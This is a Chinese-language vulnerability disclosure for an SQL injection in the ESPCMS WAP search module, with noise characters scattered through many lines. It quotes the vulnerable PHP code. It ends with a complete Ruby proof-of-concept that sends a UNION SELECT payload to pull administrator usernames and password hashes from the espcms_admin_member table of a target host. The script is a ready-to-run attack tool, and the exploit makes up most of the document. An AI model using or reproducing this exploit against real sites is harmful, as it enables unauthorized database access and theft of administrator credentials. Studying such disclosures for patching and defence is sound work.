espcms wap模块搜索处SQL注入

admin

0×0 漏洞概述0×1 漏洞细节
/ S( H$ E# c+ ~6 m$ O0×2 PoC


/ b: F' \5 V* B) j
3 ~& E) R. c" R! I* v0×0 漏洞概述

易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统，它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便，可以帮您迅速、轻松地构建起一个强大专业的企业网站。
. G! n3 _! m# g其在处理传入的参数时考虑不严谨导致SQL注入发生


0×1 漏洞细节
1 C' t- \2 ^. P+ S& c4 X
$ o+ N: b& O4 \& A4 C- W, Z变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query，整个过程无过滤导致了注入的发生。
; V8 u# Z2 B  T! W( ^2 E* t! v, I正因为变量是从$_SERVER['QUERY_STRING']中去取的，所以正好避开了程序的过滤。
) n5 }# `( w( ?. }而注入的变量是数组的值，并非数组的key，所以也没过被过滤，综合起来形成了一个比较少见的SQL注入。

) ]  [9 l' s# i1 @7 X& f; p在/interface/3gwap_search.php文件的in_result函数中:


0 K: o. u  ^% [' b3 R. @$ E
, Q' `& t+ e) l: I/ ~       function in_result() {
0 W" J2 G' u2 G' o+ o            ... ... ... ... ... ... ... ... ...
            $urlcode = $_SERVER[ 'QUERY_STRING '];
            parse_str(html_entity_decode($urlcode), $output);
8 j6 R! u% t3 y$ @5 s7 j: a: G
            ... ... ... ... ... ... ... ... ...
9 o7 p- O* y) q6 H; A            if (is_array($output['attr' ]) && count($output['attr']) > 0) {

; C: \: u3 h4 I                  $db_table = db_prefix . 'model_att';

                   foreach ($output['attr' ] as $key => $value) {
                         if ($value) {
' n+ D/ b9 K6 M4 Z5 `
  ^4 c5 }  \$ |3 j9 f) p                              $key = addslashes($key);
                              $key = $this-> fun->inputcodetrim($key);
                              $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                              $countnum = $this->db_numrows($db_table, $db_att_where);
                               if ($countnum > 0) {
2 V, O! P* u1 E1 w5 ^, x/ |7 `$ I5 g                                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
! H  z/ V  u+ [# p5 B, Y( i" P                              }
                        }
                  }
            }
1 G# O6 C& ?* T1 K            if (!empty ($keyword) && empty($keyname)) {
* U- `2 n& p/ Z) l                  $keyname = 'title';
                  $db_where.= " AND a.title like '%$keyword%'" ;
  m; _- L* ?! `. _0 D5 c; v. o            } elseif (!empty ($keyword) && !empty($keyname)) {
$ t+ r: d) \/ U& d  o                  $db_where.= " AND $keyname like '% $keyword%'";
0 T: B$ `0 z+ b+ J' C            }
  _' f3 J: e# w# Q1 n  |$ b8 S            $pagemax = 15;

$ Y! K9 {, P, t$ ~            $pagesylte = 1;

( g0 J, r. x5 L1 U" {, C) K$ A             if ($countnum > 0) {

                  $numpage = ceil($countnum / $pagemax);
. ^- @- Y. z+ e9 H            } else {
                  $numpage = 1;
7 U4 e  V) |" I( l) _1 T5 I! [& |+ [            }
* }5 F6 R4 Y8 b. o4 F            $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
            $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' );            $rs = $this->db->query($sql);
+ v# h+ P! K: B            ... ... ... ... ... ... ... ... ...
% C) j2 z2 s. w' q+ I" U2 z+ E7 B      }
; k; B2 }. y9 V3 x; b1 \0 R& k' [) X
' Q! c5 v  ]* j' f  q6 ?
$ T( Z3 w" M7 x0×2 PoC
' L' a, J, Q* z- N
+ q* d$ O  B. ?1 J' ?

) u, {* L* [  N+ v/ x. Xrequire "net/http"

def request(method, url)
* d4 o- E8 m' B9 o( x6 M    if method.eql?("get")
        uri = URI.parse(url)
. g0 O, Y- c! t1 `7 I/ ^) p% U        http = Net::HTTP.new(uri.host, uri.port)
        response = http.request(Net::HTTP::Get.new(uri.request_uri))
0 J- h$ f3 s* O2 w5 u4 c        return response
    end
end
; [" V& d/ ]; A5 E
doc =<<HERE
-------------------------------------------------------
Espcms Injection Exploit
' }* G: Q! k( A9 u6 iAuthor:ztz
Blog:http://ztz.fuzzexp.org/
: x) p5 @8 |! [3 z-------------------------------------------------------

' f6 t/ W" J8 @5 IHERE

8 S7 }* V) o' U% _: e+ s' @& }( yusage =<<HERE
  G/ e, R: g* j5 x6 {2 h0 R" O6 }Usage:         ruby #{$0} host port path
example:     ruby #{$0} www.target.com 80 /
8 _+ U7 i! n" K  QHERE

puts doc
if ARGV.length < 3
    puts usage
- X1 b7 `) x; xelse
% S0 V) F9 T% p7 L    $host = ARGV[0]
! w0 }$ S; l5 L4 ]7 a( b/ M    $port = ARGV[1]
    $path = ARGV[2]
5 E+ L: z1 ~! k: J/ v( ~
    puts "

send request..."
4 A, l1 r$ O- T2 N    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
7 Y6 f; F4 Y2 {1 x8 r9 eattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
9 i. O$ D1 W$ M. Y,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
0 ~  S. R! e: W: o* A) [    response = request("get", url)
& [+ q) Z0 }; d& ^% r* d7 G- D    result = response.body.scan(/\w+&\w{32}/)
' [4 [6 T+ g, _    puts result
end